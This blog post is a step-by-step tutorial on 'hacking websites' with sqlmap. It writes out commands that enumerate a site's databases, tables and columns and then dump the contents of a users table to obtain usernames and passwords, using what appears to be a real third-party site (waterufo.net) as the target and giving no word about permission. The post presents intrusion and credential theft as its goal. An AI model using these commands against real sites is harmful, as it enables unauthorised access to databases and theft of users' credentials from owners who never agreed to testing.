In my previous articles, i have shown you how we can hack websites using Simple SQL injection and Query based basic SQL injection and blind SQL injections. Today i am going to show you how we can hack websites using SQLmap. When manual methods donot let me hack the websites,then Sqlmap is my favourite tool. So before proceeding into this article i would like to suggest you to read my previous articles on SQLinjections, if you have missed them.
What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Things you require
1) BackTrack 5
2) A vulnerable website :p
The vulnerable link i am going to use is
Step by step Procedure to hack
First open Backtrack5 and then open SQLMAP. You can open SQLMAP by doing the following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.
It opens your sqlmap console .
Scanning the URL and finding out the database names
Now i am going to scan the url using the following command.
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 –dbs
Here –u is for URL .
You can also scan the entire website by simply replacing the above URL with the website’s URL.
Now i am going to scan the link.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped by pressing ‘N’. You can continue the scan if you want.
Finding out table names
Great..!! We got the database names. Now we need to find out the table and column names. As information_schema is for metadata, i am going with the database “waterufo_net”.
The following query gives me the table names.
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
Here –D is to specify the name of the database.
Finding out column names
Fine.. Now we got 6 tables. As we are always interested in usernames and passwords, lets move on to the fl_users table and find the column names in that table.
So we use the following query
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D waterufo_net
Here -T is for tablename.
Retrieving Data
We got all the columns from the table fl_users. Now we have to retrieve the data from the database. For that we need to write the following query. We are just adding –dump to the above query.
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D waterufo_net –dump
No comments:
Post a Comment